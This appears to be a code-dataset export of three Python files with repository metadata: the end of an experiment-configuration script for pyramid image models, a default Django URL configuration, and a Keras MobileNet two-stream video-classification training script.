ch032_1side_5__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_4_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_4_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_4, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_4_4side_4.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_4_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_4_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_4_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_4, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_4_4side_4.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_5_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_5_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_5_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_4, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_5_4side_4.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_5, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_5_4side_5.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
#############################################################
if(__name__ == "__main__"):
print("build exps cost time:", time.time() - start_time)
if len(sys.argv) < 2:
############################################################################################################
### 直接按 F5 或打 python step10_b1_exp_obj_load_and_train_and_test.py,後面沒有接東西喔!才不會跑到下面給 step10_b_subprocss.py 用的程式碼~~~
ch032_1side_1__2side_1__3side_1_4side_1.build().run()
# print('no argument')
sys.exit()
### 以下是給 step10_b_subprocess.py 用的,相當於cmd打 python step10_b1_exp_obj_load_and_train_and_test.py 某個exp.build().run()
eval(sys.argv[1])
| [
"[email protected]"
] | |
0a32d2b6c410aca949535c18a0afdc1811fa82de | d77cee829ec56d2ef12446bf1ebc75cf3a1d8de8 | /src/confluence/urls.py | 11ca30b6e7eba5d7d393b109c004ba297c8ac408 | [
"MIT"
] | permissive | thisisayush/Confluence | 6a508fdd96aebf38a9d063760fed7709c1a968f5 | a7e7b3b4d45ae9577f44d112c7383e4e101f3dd6 | refs/heads/master | 2021-04-15T08:02:05.097647 | 2017-03-02T19:15:49 | 2017-03-02T19:15:49 | 94,565,851 | 0 | 0 | null | 2017-06-16T17:15:55 | 2017-06-16T17:15:55 | null | UTF-8 | Python | false | false | 946 | py | """confluence URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Import the include() function: from django.conf.urls import url, include
3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api-auth/', include('rest_framework.urls',
namespace='rest_framework')),
]
| [
"[email protected]"
] | |
60aab1d320ca746684132493414659925b08ba03 | e916c49c5fa662e54c9d9e07226bc2cd973d2bf1 | /ucf11/mobilenet_twostream2_max.py | a3016608854db500c3c5ee8969cc9ce7ca2bf52f | [] | no_license | Zumbalamambo/cnn-1 | 7111a3ff70344a9c118971f22539fedaffc394fb | 0cc6ef095f5b03152696a75f44109cb67d62cd0e | refs/heads/master | 2020-03-14T04:07:22.213824 | 2018-03-30T09:02:51 | 2018-03-30T09:02:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,298 | py | import keras
import sys
from keras.models import Model
from keras.layers import Dense, Conv2D, Activation, Reshape, Flatten, Input, ZeroPadding2D, Maximum
import get_data as gd
from keras import optimizers
import pickle
import random
import numpy as np
import config
# train: python mobilenet_two_stream.py train 32 1 101 0 0
# test: python mobilenet_two_stream.py test 32 1 101
# retrain: python mobilenet_two_stream.py retrain 32 1 101 1
if sys.argv[1] == 'train':
train = True
retrain = False
old_epochs = 0
spa_epochs = int(sys.argv[5])
tem_epochs = int(sys.argv[6])
elif sys.argv[1] == 'retrain':
train = True
retrain = True
old_epochs = int(sys.argv[5])
else:
train = False
retrain = False
opt_size = 2
batch_size = int(sys.argv[2])
epochs = int(sys.argv[3])
classes = int(sys.argv[4])
depth = 20
input_shape = (224,224,depth)
server = config.server()
if server:
if train:
out_file = '/home/oanhnt/thainh/data/database/train-opt2.pickle'
else:
out_file = '/home/oanhnt/thainh/data/database/test-opt2.pickle'
valid_file = r'/home/oanhnt/thainh/data/database/valid-opt2.pickle'
else:
if train:
out_file = '/mnt/smalldata/database/train-opt2.pickle'
else:
out_file = '/mnt/smalldata/database/test-opt2.pickle'
# two_stream
model = keras.applications.mobilenet.MobileNet(
include_top=True,
dropout=0.5
)
# Disassemble layers
layers = [l for l in model.layers]
input_opt = Input(shape=input_shape)
x = ZeroPadding2D(padding=(1, 1), name='conv1_padx')(input_opt)
x = Conv2D(filters=32,
kernel_size=(3, 3),
padding='valid',
use_bias=False,
strides=(2,2),
name='conv_new')(x)
for i in range(3, len(layers)-3):
layers[i].name = str(i)
x = layers[i](x)
x = Flatten()(x)
x = Dense(classes, activation='softmax')(x)
temporal_model = Model(inputs=input_opt, outputs=x)
if train & (not retrain):
temporal_model.load_weights('weights/mobilenet_temporal22_{}e.h5'.format(tem_epochs))
# Spatial
model2 = keras.applications.mobilenet.MobileNet(
include_top=True,
input_shape=(224,224,3),
dropout=0.5
)
y = Flatten()(model2.layers[-4].output)
y = Dense(classes, activation='softmax')(y)
spatial_model = Model(inputs=model2.input, outputs=y)
if train & (not retrain):
spatial_model.load_weights('weights/mobilenet_spatial2_{}e.h5'.format(spa_epochs))
# Fusion
z = Maximum()([y, x])
# Final touch
result_model = Model(inputs=[model2.input,input_opt], outputs=z)
# Run
result_model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=1e-3, momentum=0.9),
metrics=['accuracy'])
if train:
if retrain:
result_model.load_weights('weights/mobilenet_twostream2_max_{}e.h5'.format(old_epochs))
with open(out_file,'rb') as f1:
keys = pickle.load(f1)
len_samples = len(keys)
if server:
with open(valid_file,'rb') as f2:
keys_valid = pickle.load(f2)
len_valid = len(keys_valid)
print('-'*40)
print 'MobileNet Optical #{} stream only: Training'.format(opt_size)
print('-'*40)
print 'Number samples: {}'.format(len_samples)
if server:
print 'Number valid: {}'.format(len_valid)
histories = []
for e in range(epochs):
print('-'*40)
print('Epoch', e+1)
print('-'*40)
random.shuffle(keys)
if server:
history = result_model.fit_generator(
gd.getTrainData(keys,batch_size,classes,5,'train'),
verbose=1,
max_queue_size=2,
steps_per_epoch=len_samples/batch_size,
epochs=1,
validation_data=gd.getTrainData(keys_valid,batch_size,classes,5,'valid'),
validation_steps=len_valid/batch_size
)
histories.append([
history.history['acc'],
history.history['val_acc'],
history.history['loss'],
history.history['val_loss']
])
else:
history = result_model.fit_generator(
gd.getTrainData(keys,batch_size,classes,5,'train'),
verbose=1,
max_queue_size=2,
steps_per_epoch=3,
epochs=1
)
histories.append([
history.history['acc'],
history.history['loss']
])
result_model.save_weights('weights/mobilenet_twostream2_max_{}e.h5'.format(old_epochs+1+e))
print histories
with open('data/trainHistoryTwoStreamMax2{}_{}_{}e'.format(2, old_epochs, epochs), 'wb') as file_pi:
pickle.dump(histories, file_pi)
else:
result_model.load_weights('weights/mobilenet_twostream2_max_{}e.h5'.format(epochs))
with open(out_file,'rb') as f2:
keys = pickle.load(f2)
len_samples = len(keys)
print('-'*40)
print('MobileNet Optical+RGB stream: Testing')
print('-'*40)
print 'Number samples: {}'.format(len_samples)
score = result_model.evaluate_generator(gd.getTrainData(keys,batch_size,classes,5,'test'), max_queue_size=3, steps=len_samples/batch_size)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
| [
"[email protected]"
] |
Subsets and Splits